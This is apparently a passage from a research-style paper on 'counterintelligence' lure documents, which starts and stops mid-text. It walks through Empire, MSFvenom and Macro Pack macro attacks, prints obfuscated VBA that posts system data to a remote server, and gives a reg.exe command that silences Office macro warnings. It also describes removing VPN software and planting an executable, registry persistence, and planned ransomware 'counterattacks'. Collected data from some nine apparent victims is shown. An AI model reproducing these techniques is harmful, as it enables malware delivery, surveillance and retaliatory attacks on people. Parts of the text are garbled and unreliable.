(Visaggio, 2023) The State of the Malware: What Can We Defend Against?	Review and analysis of existing malware defense techniques	N/A	Proposing a holistic approach that combines multiple defense mechanisms and emphasizes proactive measures such as threat hunting and employee training	Difficulty in implementing proactive measures due to resource and budget constraints, and the ever-evolving nature of malware requires constant updates and adaptations to defense strategies
(Shujaat Mirza "et al, 2023) Tactics, Threats & Targets: Modeling Disinformation and its Mitigation	Game theory	security threat model	Using game theory to model disinformation and identifying the best strategy to mitigate it	The proposed solution may not be applicable to all types of disinformation campaigns and may require significant resources to implement

Methodology:

The methodology part is divided into several sections, for instance the existing techniques for exploitation and our methodology architecture with test cases.

Existing Methods for Exploiting Windows Systems Through Macros

When you're working with an Excel or Word document and want a certain repetitive procedure to be completed without your intervention, this was the issue that customers of the just launched Microsoft

Office ran into. Macros were created by Microsoft as a solution to this problem. Macros are Visual Basic scripts that can be developed and shared, and they work in the background without the user's knowledge (if enabled).

Exploitation

An exploit is a piece of software, data, or a series of instructions that exploits a vulnerability to induce unwanted behavior or obtain unauthorized access to sensitive information. On the website, Common Vulnerabilities and Exposures, vulnerabilities are discovered and made publicly accessible (CVE). CVE is a free vulnerability dictionary that assigns a unique number to each vulnerability or exposure to make the world's cyber security and resilience better.

Now that we've identified macros and their associated risks, let's consider how they could affect real-world situations. We've created a lab environment using Kali Linux, Windows 10, and other technologies. We'll break into a Windows machine using five separate tools.

Empire

To use Empire on Kali Linux, the Empire Framework must be installed on your attack machine. This is a simple operation. After a successful installation, we'll activate the framework. We searched for active listeners using the "listeners" command. As far as we can tell, there were no listeners on the run. Let us immediately create one. An HTTP Listener has been configured. Following that, we'll need to create a stage for the newly constructed listener. We'll utilize the same Macros that we used for the demonstration to create the stage. The listener will be connected to the stager and the setup will be executed. This builds a stage in the directory "/tmp/macro".

Moving on to the Target Machine, the following steps have been reduced since we are conducting this example in a lab environment. We create a typical Excel file and fill it with information. After that, we chose the "VIEW" option. This tab is where you'll choose the Macros option.

A little window will emerge when you click on the Macros, as seen in the image below. The name of the macro is requested here. It could be anything. After giving your project a name, click the "Create" button to get started.

Now we have a blank module to create a macro in. We went back to our Kali Machine and copied the code that the Empire had produced. Then we put the contents of the macro file into this blank module, as shown in the diagram below. This is how it looked before.

After pasting the code, we choose the Save As option from the menu. It opens a window. As shown in the image below, we name the file and choose Excel Macro-Enabled Workbook in this box. We click the "Save" button when we've entered all the necessary information.

This was all that was necessary in the past. However, in response to the rise of macro-related attacks in the normal Office environment, Microsoft has included user-end verification to block certain attacks. We're going to create a fresh Excel workbook right now. The "File" tab is selected.

A little window like the one shown below will appear when you click the Options Section. There is now a section titled "Trust Center" on the window's left-hand menu. We used it to get access to a variety of privacy and security settings. In this section, there is a section called "Microsoft Excel Trust Center," and we may access its settings by clicking the "Trust Center Settings" button. This creates a new window with a Macro Settings section. It is something we have chosen. It creates four macro policies in total, one for each radio button. The policy "Disable all macros with notice" is selected by default. We close the window and change the policy to "All macros enabled."

Now we'll open the workbook with the malicious macros. It opens without stumbling blocks, warnings, or prompts. We went back to our attacker's computer to check the Empire, only to find that one of our agents was still active. Using the agent's command, we investigated the problem. In this scenario, we can see that we have an agent. Using the interact command, we tried to communicate with the agent. If we want to use the Empire and Macros combination to get into a target, we should use this method to do so.

Metasploit

Next, let's take a more basic look at the situation. Most anti-virus software recognizes the signature of the Metasploit Payload signature. We'll use Metasploit to exploit our target, using Marcos to comprehend the core attack and practice in a lab situation. Metasploit provides exploits and tools for taking advantage of system flaws, payload sets of malicious code, auxiliary functions that provide extra tools and commands, encoders that change code or information, listeners that hide malicious software to gain access, shellcode code that is set to run once inside the target, post-exploitation code that helps test deeper penetration once inside, and nops is the instruction to stop.

The first thing we'll do is create a payload. MSFvenom will be used to create the payload. We used the reverse http payload for this experiment. The local IP address of a Kali Linux-based assault computer was used to identify it. In addition, for the formation of the session, a local port must be specified. After making the payload to the right specifications for the VBA payload, we send the VBA payload materials to the target system.

Macro Pack

This is the next thing we want to use. The Macro Pack is included. This tool works very much like Lucky Strike. To start the session, we'll need something to load. In this case, the MSFvenom tool will be used to do this job. We used the MSFvenom tool on our Kali machine to make a payload.

We'll execute a Python one-liner and place it on the local port number 80 to run the payload when it's been created.

After that, we'll go to our windows computer and download the tool. Then we'll utilize the macro pack to create an Excel file with the malicious payload, which we'll send to our email address. We went to the place where the macro packer made the payload and used our social engineering skills to send it to the person who was supposed to get it. This is how it worked: The payload was sent, and then the Excel workbook was opened. To find the security warning, look at the image below. Listener: Before you do anything else, make sure that the listener is up and running. Our meterpreter session with the target user starts as soon as the target user clicks the button to allow content.

We set up the listener to look for the same payload that we made with the MSFvenom tool when we set it up. To make this payload, we also include our Kali Machine's local IP address and port, which we talked about when making the payload. par

Furthermore, all these methods are used for counterintelligence. Therefore, we will discuss our purpose methodology vision with explanatory examples.

Deep analysis on previous methods of Counterintelligence

The Canary Tokens:

So, the question that came to our mind is whether detecting cyber-attackers with honey tokens is effective?

The tokens based on documents have several issues with Canary tokens. Any document that could be "infected" and hence difficult to clean up might be fooled by running it through a public web scanner before opening it. The attacker's virtual identity will be obscured while the token is repeatedly activated from numerous IP addresses across the globe. Tokens based on executable code are likewise vulnerable to this flaw.

Another problem with document-based tokens is their dependency on certain document readers and circumstances to activate the tokens. A document reader that is not listed in the program documentation, or a security feature that allows the token to be bypassed, may allow an attacker to open an "infected" document. CVE-2019-9768 reveals a new issue that must be addressed. When a token is embedded in a Word document, its size, metadata, and date are all the same, making it simple for attackers to identify

which documents may be "infected." There is evidence to suggest that this problem is being actively exploited by hackers.

- The main issue with canary tokens is that if the attacker uses a VPN, then we can't find the actual identity of the attacker or who is behind the VPN.
- It's likely that you're utilizing and depending on software created by someone else. You would be severely hurt if such software was targeted.
- If such a software is being actively watched, a third-party RE-canary for it may inform you.
- It is possible to detect cyber-attackers by using honey tokens since they provide you with precise information about the attacker that you would otherwise be unable to get. In some cases, it may be impossible or very difficult to figure out the IP address of the person who did this to your computer if malware is able to get on your computer.
- When an attacker accesses a file containing a honey token, your IP address is immediately revealed. The European Union Agency for Cybersecurity (ENISA) expressly recommends using honeypots and honey tokens to catch or capture cybercriminals.
- Attackers use the Tor browser as well to hide their actions, so using honey tokens isn't possible to get adversarial intel.
- If an attacker blocks the outgoing traffic to that embedded URL in the footer of the document, then canary tokens will fail.
- Adobe Reader DC It inquired if we wanted to block the trigger. The token does not work with Foxit Reader. Maybe Adobe Reader only? The.doc token only works with Microsoft Word, not OpenOffice, when on the hard drive.
- However, honey tokens aren't enough to safeguard your company's infrastructure on their own. Aside from revealing potential threats and weaknesses in your system, these technologies are useless without the assistance of additional security measures like next-generation firewalls (NGFW) or secure web gateways (SWG).
- Canary tokens only provide limited information, like the user agent and IP address.
- Canary URL tokens, for example, are easily detectable via proxy sites (getlinkinfo.com, urlxray.com).

```
INCLUDEPICTURE..  
"http://canarytokens.com/static/terms/articles/6x2xw3z1glys0bdx7fdzt3mio/submit.aspx".\d.\*.  
MERGEFORMAT  
  
Target="http://canarytokens.com/static/terms/articles/6x2xw3z1glys0bdx7fdzt3mio/submit.aspx" TargetMode="External"/>  
</Relationships>
```

When we dig deeper and look for more information about canary tokens, we find that they use a simple link that is put below the footer of the Word document. The link shown in figure.

A well-informed attacker may readily bypass document-based tokens now, based on the limitations we observed. So, we proposed several kinds of tokens that are made by multiple obfuscation techniques which can also bypass the defender and sandboxes. Our documents base tokens are good enough for counterintelligence and attack perspectives.

This article identifies research gaps that prevent focused threat intelligence from conducting proactive adversarial system intelligence and controlling attackers' machines through counterintelligence and retaliation. The goal of this research is to equip governments/enterprises with practical document-based tokens and a proactive defensive setting so they may perform threat hunting by gathering system data,

threat intelligence, attack pathways, malware, and TTPs from attackers. My approach is divided into two components. To trick attackers and spot APT attempts early on, I will create malicious Word, Excel, and PDF documents in the first stage. These innocent files will contain payloads in the shape of macros and will help me in gathering information about the opponents and finding them quickly, we deployed cyber-deception.

Cowrie is an open-source honeypot tool designed to simulate a target system and detect attacks against it. It emulates various services, such as Secure Shell (SSH), Telnet, and File Transfer Protocol (FTP), to attract and log the actions of attackers. The tool provides insight into the tactics, techniques, and procedures (TTPs) used by attackers, enabling the governments/organizations to better understand and defend against cyber threats) as well as normal word and excel files but these will be lured documents, pretending to contain confidential company information but, these simple office files will be containing the payloads. It is like catching a fish with the help of bait or a mouse trap. It is expected that the threat actors may employ honeypots and lure files for counterintelligence and counterattack so that they can take advantage of their weaknesses and offer information unknowingly.

Our malicious code is placed in a variety of documents using a variety of approaches to circumvent the VPN on the attacker's system. In the third form of the lure file, we can defeat the VPN, get the actual intel of the attacker, and take full control of its system as well. We proposed a multi-stage algorithm that is written in C-sharp code and placed inside the Excel donut document, which has an auto-enabled format. After clicking the excel file, the code is executed and our algorithm runs, and we will get the system information as well, like capturing the IP address at that stage. Furthermore, our algorithm is divided into several parts. Firstly, it will get all the startup services that are placed in the startup folder. Secondly, it will remove those third-party applications like VPN from the registry and startup folder as well. Similarly, place an exe file in the startup folder and reboot the machine after restarting the operating system.

The exe file will be executed. Data is no longer encrypted when a VPN disconnects, and your actual IP address becomes visible. Furthermore, after getting access to the hacker's machine, we will counterattack

in the form of ransomware and get system keys as well as display a notification saying, "Send message for decryption." Lastly, when our proposed mechanism is executed on an attacker's computer, we will be able to create backdoor sessions and perform further attacks. Figure 5 illustrates the flow of our proposed multi-stage algorithm for counterintelligence and counterattack. Furthermore, the given algorithm illustrates how to defeat a VPN and find out the actual identity of the attacker. For instance, we evaluate our methodology into several parts, for instance, IP address before and after removing the VPN application, Persistence Connection, Custom Command and Control, and Adversarial Exfiltration.

Malicious Document Creation:

Several malicious document generation algorithms were devised in this section. Bypassing the VPN is an important part of our suggested solution. Therefore, we devised a multi-stage algorithm. In order to carry out the multistage process, we use luring files like Excel. In the code below, you can see an example of a malicious file that will run a sequence of algorithms.

We use the Excel Donut Repository, which is a macro generator for Excel 4.0's xlm format. program created in C# source code (exe), and then use an xlm (Excel 4.0) macro to run it in memory. Macros created using xlm (Excel 4.0) can be stored in xls documents. We provide a malicious payload C# file (something like a Cobalt Strike Beacon EXE with a main function that runs). Mcs compiles the C# code into two.NET assemblies, one for each architecture: x86 and x64.

Each assembly is then converted to position-independent shellcode using the fantastic utilities Donut (for x86) and CLRvoyance (for x64). The payload is chunked into lines with a maximum of 255 characters (for x86) or 10 characters, and all null bytes are deleted since XLM (Excel 4.0) macros don't like null bytes (for x64). The shellcode is coupled with basic process injection methods (VirtualAlloc, WriteProcessMemory, and CreateThread) to decide whether the payload (x86 or x64) will be executed on the target system. Our macro will be updated when we choose to run sandbox checks or simple obfuscation. The last step is to save the results to a CSV file (saved as.txt).

Last, we create a malicious JavaScript file dropper, so that malicious JS code can be generated and inserted into several files, such as MS Word (.doc,.docm,.docx,.dotm), MS Excel (.xls,.xlsm,.xlsx,.xltm), and MS PowerPoint (.pptm, .potm). As an implementation, we utilize the HXD editor to obfuscate our VBA script into base 64 format, which we can then export and import into the Java Script file in c# format. In the Java Script code, we can change the file extension to something like Excel, PDF, or Word.

Basically, in the document we are adding some type of special content for the user in which he is interested too. The more user got the interested, we are getting nearer to phish it. The whole process of phishing through macro enabled document is shown in the below figure. Algorithm 2 and Algorithm 3 also help us to understand the whole process of this scenario. We described both the server side and malware side of this document in the algorithms.

MACRO DOCUMENT MALWARE SIDE ALGORITHM 1

1. Start Process

2. `access(cmd.exe)`
3. **Run-Command**("systeminfo")
4. `systeminfo` store in variable
5. **POST** Request

6. getcommand.php

MACRO DOCUMENT MALWARE SIDE ALGORITHM 2

1. **START PROCESS**
2. **RUN EXE**
3. **GETCOMMAND.PHP**
4. **DATA**
5. **PHP QUERY {SAVE DATA}**
6. **STORE IN DATABASE**
7. **RESULTS IN TABLE FORMAT**
8. **INDEX.PHP**
9. **PHP QUERY**
10. **WHILE**
11. **(**
12. **ALL DATA ON SCREEN**
13. **)**

Implementation:

For the purposes of this study, I built a data center infrastructure in which I established a Microsoft Hyper-V server. It's a fully virtualized environment established on a dedicated HP Z840 workstation machine as it is a low-end server and a high-end desktop PC with huge computing power and brilliant performance. It is a real looking ADDS environment (Active Directory Domain Services) containing windows and Kali Linux servers and client virtual machines. On the server side, I access the attacker logs via public and private paths that have been built. Additionally, I used SSH ports that were open on a lot of Windows and Cowrie honeypots with canary tokens. Because many of the fake Docker containers that OVS hosts can be identified from one another by the way they respond to an attacker, the decoy configuration also includes PCs with Ubuntu (OVS). OVS runs a large number of phony Docker containers, which may be distinguished by the way they react to an intruder I went an extra mile by obfuscating the code so that it can bypass the attacker's detection system and can fetch me my required information from the adversary side. This is how I designed the complete deception system and attracted the attackers. Automated scripts are added to the created lured documents using code obfuscation.

When the token is accessed, these scripts start running and collect data about the system from which the token was obtained. Information on the operating system of the attacker, the kind of network they are using, and details about the network's banner are among the data that is obtained. With this, I was able to locate the attacker. As I studied psychology for my bachelor's degree, I understand criminal psychology a little. Different geo-locations in the world have different types of criminals. Hence, identifying the geo-location of the hacker can help me understand the motives of the cyber-attack launched on my infrastructure and network. The attacker's computer's BSSID is used to pinpoint their location. A map with pins indicating the attacker's location is displayed. An IP's location can be filtered according to tokens, to show the exact country.

```
[*] Showing obfuscated result...
{ ' 2000!': 'chr(97) & "s" & "q" & "" & "q" & "" & "q" & "" ',
' 3.11': ' "a" & "" & chr(114) & "" & "o" & "p" & "" & chr(112) ',
' 7': 'chr(97) & "v" ',
' 8': ' "a" & "y" & "" ',
' 95': ' "a" & "" & "x" & chr(116) ',
' 98': 'chr(97) & chr(120) & chr(121) & "" ',
' ME!': ' "a" & "\x0c" & "" & chr(4) & "" ',
' OS 9!': ' "a" & "" & chr(14) & chr(18) & chr(97) & "x" ',
' OS X!': 'chr(97) & "" & chr(14) & "" & chr(18) & "" & "a" & "\x19" ',
' Server 2003/XP x64!': ' "a" & chr(18) & "$" & "3" & "7" & chr(36) & "3" & '
' & chr(97) & "s" & "q" & "q" & "" & "r" & chr(110) & "" '
' & "\x19" & "" & "\x11" & "" & chr(97) & "9" & "" & '
' & chr(119) & "" & "u" & "" ',
' Vista!': 'chr(97) & "" & "\x17" & "" & "(" & "" & chr(50) & "" & chr(53) & '
' "" & chr(32) & "" ',
' XP!': 'chr(97) & "\x19" & "" & "\x11" & "" ',
' <br /><br /><br />': ' "}" & chr(35) & "" & "3" & chr(97) & "" & chr(110) & '
' "\x7f" & "}" & chr(35) & "" & chr(51) & "" & chr(97) & '
' "" & "n" & chr(127) & "}" & "" & "#" & "" & "3" & "a" '
' & "" & "n" & chr(127) & "" ',
' <br /><strong>operating System: </strong>': 'chr(125) & "#" & "3" & "a" & '
' "n" & "" & chr(127) & "" & "}" '
' & "" & "2" & "5" & "" & chr(51) '

```

Figure 7: Code Obfuscation 1

Test Case of Obfuscation:

For individuals who know how to use the VB editor, access to the VBA code is automatically available in Excel or any other program. Unprotected VBA code could be accessed by any user, potentially causing damage. In the worst-case scenario, macro infections could introduce malicious code that fools users or compromises their PC's security. Password-protect your VBA script. You can still execute your VBA code,

```
VKhlwbXcRIKkoz(Array((27 XOR ((64 - 23) + 19)),15,207,(((15 - 7) + 79) XOR ((2 - 1) + (69 - 28))), (243 - 54)),Array(1
07,(51 + 20),155,(2 XOR 21 + 22)),(320 - 83)))
HmShLqdtNOpwYFF.Open VKhlwbXcRIKkoz(Array(209,(35 + (0 - 0)),17,156),Array(129,108,(57 + (12 - 3)),200)), VKhlwbXcRIK
koz(Array(81,(151 - 11),(15 + 89),(162 - 70) + 16),(154 - 45),158,(24 + (92 - 0)),(139 XOR (14 + (26 - 12))), (70 + 7
9),202,221,146,76,((33 + (2 - 0)) XOR 185),230),Array((37 + 20),(143 + 105),28,(22 + 6),((0 + 4) XOR 83),177,(151 - 6
0),164,(20 XOR (136 + 91)),253,((217 - 56) XOR 75),(336 - 145),125,173,(197 + 14))) & _
VKhlwbXcRIKkoz(Array(417 - 178),(((28 - 0) + 37) XOR (342 - 139)),71,189,(247 - 86),102,95,(11 XOR (6 + 12)),((58 -
10) XOR 96),((90 - 17) XOR (9 + 7)),142,((15 - 2) XOR (0 - 0)),(75 + 10),156,(20 + 76),Array((285 - 91),187,((0 + 0)
XOR ((85 - 27) + 61)),(51 XOR ((190 - 31) + 26)),140,84,((45 - 16) + 79),(30 XOR (7 + 45)),(205 - 80),((120 - 58) +
(45 - 1)),((59 + (17 - 6)) XOR (3 + 246)),(51 - 16),59,251,18)) & _
VKhlwbXcRIKkoz(Array((337 - 90),(138 + 5),(13 + 34),73,(11 XOR 23)),Array(152,228,(1 + 0),32,(212 - 97)))
HmShLqdtNOpwYFF.setRequestHeader VKhlwbXcRIKkoz(Array((79 + 55),((80 - 28) + 90),(0 XOR 0),(144 - 49),(22 + 130),138,
120,(407 - 164),(166 XOR 70),230,(((8 - 2) + 20) XOR 0),(23 + 220)),Array((33 + (218 - 54)),((145 - 65) + 145),(55 +
47),(12 + (31 - 0)),253,(9 + (236 - 17)),12,222,(130 XOR (82 - 28)),159,((80 - 27) XOR (144 - 49)),150)), VKhlwbXcRIK
koz(Array((23 XOR (49 + (44 - 11))), (214 XOR (50 - 15)),(29 + 43),(108 - 46),(59 XOR ((99 - 45) + 88)),(277 - 79),(31
3 - 126),(50 - 24) XOR (0 - 0)),(46 - 22),95,(8 + 78),(119 + (1 - 0)) XOR ((11 - 4) + (6 - 2)),(7 - 3) XOR (1 + 0)
), (97 XOR 216),((91 - 31) XOR 125)),Array((22 + 14),(59 + 74),(65 - 9),((42 - 18) XOR 74),(264 - 44),((139 - 24) XOR
214),218,(208 - 98),((174 - 78) + (22 - 5)),(35 XOR 19),56,48,(142 - 17),(16 + 132),54)) & _
VKhlwbXcRIKkoz(Array((35 + (112 - 4)),(6 + 58),((0 - 0) + 38),(3 + 15),(0 + 2),190,153,86,(418 - 175),80,35,(15 + 68)
),((1 + 0) XOR ((2 - 0) + (1 - 0))), (17 XOR 182),206),Array((219 XOR ((27 - 7) + (22 - 7))),((2 + (3 - 1)) XOR 51),11,
(145 - 29),(145 - 36),(114 XOR 199),244,123,(251 - 117),34,((13 + 20) XOR ((93 - 11) + 28)),54,(87 + 21),196,(110 + 5
1))) & _
VKhlwbXcRIKkoz(Array(134,190,(1 XOR 2)),Array(226,(116 + 103),103))
HmShLqdtNOpwYFF.Send VKhlwbXcRIKkoz(Array(114,(55 + (136 - 31)),(178 - 76),98,(93 - 0),187,65,(30 + (61 - 30)),97,(25
1 - 27),(151 XOR (0 + (57 - 2))), (28 XOR 230),(((45 - 15) + 211) XOR (16 - 8)),((210 - 95) + 10) XOR ((0 - 0) + 0)),
44),Array(((48 - 23) + 4),((375 - 166) + (4 - 2)),(54 + 37),((8 + (18 - 6)) XOR (2 - 1)),((32 - 14) XOR 38),(393 - 18
0),37,82,(22 XOR 0),(188 XOR (439 - 184)),134,(((60 - 22) + 34) XOR 214),152,(13 - 4),77)) & _
VKhlwbXcRIKkoz(Array(134),Array((179 XOR (12 - 4)))) & wifienc
End Sub

+[32mvba.vba obfuscation complete !
Result stored in output.txt-[0m
```

Figure 8: Code Obfuscation 2

but only if you know the password. Unfortunately, various free and cheap software programs are available for retrieving VBE passwords. Obfuscation is a strategy for safeguarding code, regardless of how hard or complicated it was. Obfuscated VBA code may operate in 32-bit and 64-bit versions of Excel if the original code was designed to work in both. Obscured VBA code has no effect on Excel VBA's run-time behavior. Obfuscation, when applied appropriately, may increase the security of the Excel program several order of magnitude yet maintain it unhacked.

The VBA code for counterintelligence is converted into obfuscated files that are shown in Figure 7 and 8. The screenshots show the exact obfuscated text. The technique for creating something hard to understand is known as obfuscation. Obfuscated programming code is widely used to protect confidential information from hackers and prevent them from decoding proprietary software. Encrypting any portion of a program's source code is one way to conceal it. Other approaches include removing potentially sensitive data, renaming classes and variables with meaningless names, and adding unnecessary code to an app script. An obfuscator is an application of software that transforms plain-text code into a program that performs the same functions but is more difficult to read and interpret.

Test case of Macro-enable Option Prevention:

VBA code is used to store macros, which are short computer programs. Creators of VBA software can create macros that can do almost anything on a machine, including connect to any external systems.

Code from: (jcleebobgatenet, 2021)

```
reg.exe add ""HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel\Security"" /v  
vbawarnings /t REG_DWORD /d 1 Value vbawarnings exists, overwrite(Yes/No)? yes
```

If unauthorized people acquire access to powerful tools like Excel's built-in macros, they can utilize them to distribute infection, control systems for botnets, collect info from databases, or send spam emails. You should only use macros in workbooks which you are acquainted with and can trust; otherwise, you should use them with caution.

Whenever you initially open a worksheet with macros enabled, a yellow "SECURITY WARNING" line will show below the ribbon. The "Enable Content" option enables macros. The harmful code is executed in the document whenever an individual taps on a macro or other information. But suppose that user hadn't selected the option to authorize macros. To overcome this issue, we created a method that allows us to do actions on the user's system's operating system by modifying the machine registry. We can simply modify the numerical value for the allowed macros in memory to 1 rather than 0 to prevent the allow macro-option from displaying once our infected document is launched on the target PC. To modify the registry value, use the command below. This command can be executed using A.bat files or VBA scripts, and the results are shown in the figure.

Test Case of Multiple Malicious Document Creation (Webdoc):

which is created via html code by changing the link attribute (stylesheet change into hyperf with our server link). It is not detectable because it is not an image because an image creates a request, but that link is

The image shows a screenshot of a ngrok terminal window and its web interface. The terminal window displays the following text:

```
ngrok  
Announcing ngrok-go: The ngrok agent as a Go library: https://ngrok.com/go  
Session Status      online  
Session Expires     1 hour, 49 minutes  
Terms of Service    https://ngrok.com/tos  
Version             3.3.0  
Build               7ed1211 (61)
```

The web interface shows a list of requests under the heading "All Requests". The first request is highlighted:

Method	Status	Duration
GET /	502 Bad Gateway	0.6ms
GET /	502 Bad Gateway	1.05ms
GET /	502 Bad Gateway	1.02ms
GET /	502 Bad Gateway	0.6ms
GET /	502 Bad Gateway	1.09ms

The details for the selected request (GET /) are shown on the right, including headers:

Header	Value
Accept	*/*
Accept-Encoding	gzip, deflate
Host	5499-182-191-131-136.in.ngrok.io
User-Agent	Mozilla/4.0 (compatible; ms-office; MSOffice 16)
X-Forwarded-For	86.98.78.3
X-Forwarded-Proto	https

Figure 10: Webdoc result 1.

not created. So, we get the IP address on the backend once the.doc document is opened. No warning or other things are shown on the document's opening page. The following codes illustrate the use of webdoc and how to embed the URL inside the stylesheet, and further screen shots demonstrate the counterintelligence part in which we collect multiple machines' IP addresses that can execute the webdoc file. To see the document response in the form of a victim's IP address and other things like user agent, we use a local server like ngrok. Well, Ngrok is a cross-platform program that provides Internet access to local server ports. In other words, it provides a free service that allows you to share a local server or website. The Ngrok server setup is shown in figure 9. The given pictures demonstrated the IP addresses and user agents that accessed our document on their machines shown in figure 10 and 11.

10 minutes ago Duration 1.09ms IP 182.191.143.112

GET /

Summary Headers Raw Binary Replay

Headers

Accept-Encoding	gzip
Host	5499-182-191-131-136.in.ngrok.io
User-Agent	Mozilla/4.0 (compatible; ms-office; MSOffice rmj)
X-Forwarded-For	182.191.143.112
X-Forwarded-Proto	https

half a minute ago Duration 0.51ms IP 119.160.67.188

Figure 11: Webdoc results 2.

Host Name	LAPTOP-DFCJIUH7
OS Name	Microsoft Windows 10 Home
OS Version	10.0.19043 N/A Build 19043
Product ID	00325-96536-48880-AAOAU
BIOS Version	Insyde F.23, 12/25/2020

“System Directory”	C:WINDOWSsystem32
‘Boot Device”	DeviceHarddiskVolume2
“Time Zone”	United Arab Emirates (GMT+4)
“Logon Server”	\LAPTOP-DFCJIUH7
“Total Physical Memory”	16,264 MB
“Available Physical Memory”	3,868 MB
Page File Location(s)	C:pagefile.sys

Test Case of Macro Enabled Document Results

In this we are adding the results of a malicious document in which we added the malicious code that enables a user to visit the website. The website downloads the specific exe and runs it dynamically. This exe sniffs the system info of the victim and sends it to our server. Our exe file was accessed by almost 12 victims, and we got the system info of 9 users.

POST /

Summary Headers Raw Binary Replay

4676 bytes application/x-www-form-urlencoded

```

os=windows&data=
Windows IP Configuration

Host Name . . . . . : DESKTOP-5TJFC11
Primary Dns Suffix . . . . . :
Node Type . . . . . : Mixed
IP Routing Enabled. . . . . : No
WINS Proxy Enabled. . . . . : No
DNS Suffix Search List. . . . . : localdomain
                                www.tendawifi.com

Ethernet adapter Ethernet:

Media State . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Description . . . . . : Intel(R) Ethernet Connection
I218-LM
Physical Address. . . . . : A0-2B-B8-2C-B6-6A
DHCP Enabled. . . . . : Yes
Autoconfiguration Enabled . . . . : Yes

Wireless LAN adapter Local Area Connection* 1:

Media State . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Description . . . . . : Microsoft Wi-Fi Direct Virtu
al Adapter
Physical Address. . . . . : 02-21-BB-E7-AD-E5
DHCP Enabled. . . . . : Yes
Autoconfiguration Enabled . . . . : Yes

Wireless LAN adapter Local Area Connection* 2:

```

Figure 12: System Information

The results of a single victim are shown in the table. Basically, this result shows us the system information of that specific user.

Test Case of find location via Files(docx, dotm, docm)

We can utilize several word document formats to collect system-related data about the computer used by the attacker and determine its location. Bypassing defenses and obtaining adversarial intel like real IP information, system details, and (MAC addresses), as shown in figures 12 and 13, is possible using the "counterintelligence" component of the suggested technique.

Results from experiments reveal a variety of details. For instance, BSID is combined with system information. We can determine the attacker's precise location by using a Mac address.

```
Media State . . . . . : Media disconnected
Connection-specific DNS Suffix . . . . . :
Description . . . . . : Microsoft Wi-Fi Direct Virtu
al Adapter #2
Physical Address. . . . . : 00-21-BB-E7-AD-E4
DHCP Enabled. . . . . : No
Autoconfiguration Enabled . . . . . : Yes

Ethernet adapter VMware Network Adapter VMnet1:

    Connection-specific DNS Suffix . . . . . : localdomain
    Description . . . . . : VMware Virtual Ethernet Adap
ter for VMnet1
    Physical Address. . . . . : 02-13-66-32-79-51
    DHCP Enabled. . . . . : Yes
    Autoconfiguration Enabled . . . . . : Yes
    Link-Local IPv6 Address . . . . . : fe80::b4dd:410b:ee9e:cc3e%14
(PREFERRED)
    IPv4 Address. . . . . : 192.168.187.129(PREFERRED)
    Subnet Mask . . . . . : 255.255.255.0
    Lease Obtained. . . . . : Friday, May26, 2023 6:18:32
AM
    Lease Expires . . . . . : Friday, May26, 2023 8:33:24
AM
    Default Gateway . . . . . :
    DHCP Server . . . . . : 192.168.187.254
    DHCPv6 IAID . . . . . : 671109206
    DHCPv6 Client DUID. . . . . : 00-01-00-01-29-09-E4-54-A0-2
B-B8-2C-B6-6A
    DNS Servers . . . . . : 192.168.187.1
    NetBIOS over TcpiP. . . . . : Enabled

Ethernet adapter VMware Network Adapter VMnet8:

    Connection-specific DNS Suffix . . . . . :
    Description . . . . . : VMware Virtual Ethernet Adap
ter for VMnet8
    Physical Address. . . . . : 00-50-56-C0-00-08
    DHCP Enabled. . . . . : Yes
    Autoconfiguration Enabled . . . . . : Yes
    Link-Local IPv6 Address . . . . . : fe80::7c28:78e3:3312:6ba8%6
(PREFERRED)
```

Figure 13: Webdoc result 2.

Word document test case (information obtained by a bot from the public domain):

We have purchased a domain “<http://securityhoneypot.com/cpanel>” where we have placed our malicious code in the form of dotm, or template files. Furthermore, the responses are shown on telegram bot. The screenshots are shown in the forms of screenshots in figure 14, 15, 16 and 17 for all the details about the bot and the malicious documents.

Figure 14: Docx file

Figure 15: Telegram Bot

Figure 16: Bot data

Figure 17: Doc file

A Test Case for malicious word document:

We have received several responses from individuals who have viewed harmful materials. We use public platforms such as “iptolocation” and others for counterintelligence. These tools are useful for obtaining comprehensive information on the machine's location. Such as where this computer is located and which nation this IP belongs to. Individual IP addresses and other information are displayed in the findings below.

Figure 18: Received information on Bot.

Figure 19: Detailed information about the IP

Once, we entered the system's IP address into a free program called IP-Lookup, as indicated in picture 18, and 19 to determine the domain of the address.

A Test Case for a Multi-Step VPN-Defeating Strategy:

The primary problem with the above approaches is that they do not function if the target is connected to

Figure 20: Before execution status

a private virtual network (VPN). The basic information displayed about the user, such as their IP address, is wrong. We demonstrated a hybrid strategy where we first obtain all of the system's started services, then remove and replace our executable file in the proper location, and last reboot the system. The system

Figure 21: script (cmd)

then uses a program that runs to ping the public IP address. The C-sharp code is placed in a XIs donut

document with an auto-enabled form; once the Excel spreadsheet is opened, the script gets executed and the algorithm we created is run; we will also obtain system information. First, we will demonstrate the results of our figure 20's examples of usage cases for disabling VPNs before operation startup status. in the next figure 21 illustrate the executed script that can be used for counterattacking. The code's Execution Result and after the operation startup status is displayed in Figure 22. Similarly, we will demonstrate the persistence approaches that may be used via malicious exe.

Figure 22: Execution

As we can see, the findings of the test show how to overcome the VPN by using various document files, such as excel and word. In the next sections, we will look at the concept "persistence" as it relates to security breaches. As individuals are aware, attackers use commercial VPN services. Premium Connection to generate persistence, then the VPN will operate automatically every time the machine reboots. To prevent such persistence, we are deleting those that remove programs from the startup and registry. A recommended approach may bypass a VPN and obtain adversarial intelligence, such as real IP information, active processes, system data arriving, and (MAC) addresses, by utilizing the "counterattack" capability. The before and after persistence results are displayed in screenshot 22. Well, there are different kinds of persistence, which are demonstrated in the next paragraph with examples of results.

Test Case of Malware Persistence Using the Registry changing:

It is critical to comprehend what the system loads when it starts up because the registry is loaded before the kernel. Figure 23 shows how to download files and use.exe to disable the macro-option value.

Red batch executions for network access keys may take some time. Effective red batch executions need persistence because it allows the batch to be changed to satisfy connection goals while still interacting with the command and management server. Many hackers use well-known programs like Metasploit and Visual Studio to create malicious code. The location of the current user's startup folder. The persistence strategy works by connecting registry keys to the machine's terminal and allowing them to run. The keys are performed every time the victim logs in to the workstation because they include the original payload

reference. The red team and hackers are known to use the registry locations indicated above to carry out this infection persistence tactic.

Conclusion:

Businesses fail to protect themselves against cyberattacks because malicious actors are continually improving their techniques of accessing into networks. Discovering the data leak after it happened is a challenging task since hackers constantly create new techniques to prevent detection. Even after a security breach, hackers have access to personal information. Attackers employ a premium VPN in order to establish persistence. Whenever the machine reboots after being set to persist, the VPN will start. To

